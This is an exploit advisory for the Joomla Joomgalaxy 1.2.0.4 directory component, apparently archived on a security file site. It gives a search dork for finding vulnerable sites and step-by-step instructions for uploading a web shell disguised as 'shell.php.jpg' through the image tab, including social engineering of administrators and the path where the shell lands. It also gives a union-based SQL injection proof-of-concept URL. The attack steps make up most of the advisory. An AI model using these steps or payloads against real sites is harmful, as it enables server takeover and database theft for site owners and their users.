what you don't know can hurt you

Joomla Joomgalaxy 1.2.0.4 Shell Upload / SQL Injection

Joomla Joomgalaxy 1.2.0.4 Shell Upload / SQL Injection
Posted Aug 2, 2012
Authored by Daniel Barragan

Joomla Joomgalaxy component version 1.2.0.4 suffers from remote shell upload and remote SQL injection vulnerabilities.

tags | exploit, remote, shell, vulnerability, sql injection
MD5 | 40f1d4f8234acfc5af5618ce2c192067

Joomla Joomgalaxy 1.2.0.4 Shell Upload / SQL Injection

Change Mirror Download
_______________________________________________________________________________________

Exploit Title: Joomla joomgalaxy 1.2.0.4 Multiple Vulnerabilites

dork: inurl:com_joomgalaxy

Date: [01-08-2012]

Author: Daniel Barragan "D4NB4R"

Twitter: @D4NB4R

site: http://poisonsecurity.wordpress.com/

Vendor: http://www.joomgalaxy.com/

Version: 1.2.0.4 (last update on Jul 27, 2012)

License: Commercial $ 149 us

Demo: http://joomgalaxy.com/demo/

Tested on: [Linux(bt5)-Windows(7ultimate)]


Joomgalaxy is a rich, comprehensive directory component brimming with unique features like Entry comparison, Pay per download, Tagging, Email Cloaking, Review and Rating with Multiple Attributes, add Articles to Entries, with many more plus all standard directory features as well.



1. Unrestricted File Upload



1a. Go to this route, Complete the form and login the site
Ingrese a esta ruta, Complete el formulario e ingrese al sitio

http://site/index.php?option=com_users&view=registration


1b. go to the following link and create a new post (sometimes it ask for confirmation of an administrator)
so then create the post with something of social engineering and wait for a confirmation, if not forget this step

vaya a este enlace cree un nuevo anuncio "Algunas veces pide confirmacion de administrador"
asi que cree el anuncio con algo de ingenieria social y espere que confirmen si no omita este paso

http://site/index.php?option=com_joomgalaxy&view=addentry


1c. once the post is published go to the tab images and upload your shell in the following way: shell.php.jpg
Una vez resgistrado el anuncio dirijase a la pestaƱa imagenes y suba su shell de la siguiente forma
shell.php.jpg


1d. Find your shell in the path
Busque su shell en este path

http://site/administrator/components/com_joomgalaxy/assets/images/Image_gallery/randomid_shell.php.jpg


2. Sql Injection


p0c:

http://site/index.php?option=com_joomgalaxy&view=categorylist&type=thumbnail&lang=en&catid=100000001-100000001=0 union (select 1,database(),3,4,5,6,7,8,9,10,11,12,13)



Gretz : devboot, P1l0tcast, ksha, dedalo, etc..


Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________________________________________________
Daniel Barragan "D4NB4R" 2012
Login or Register to add favorites

File Archive:

June 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    10 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    15 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    0 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close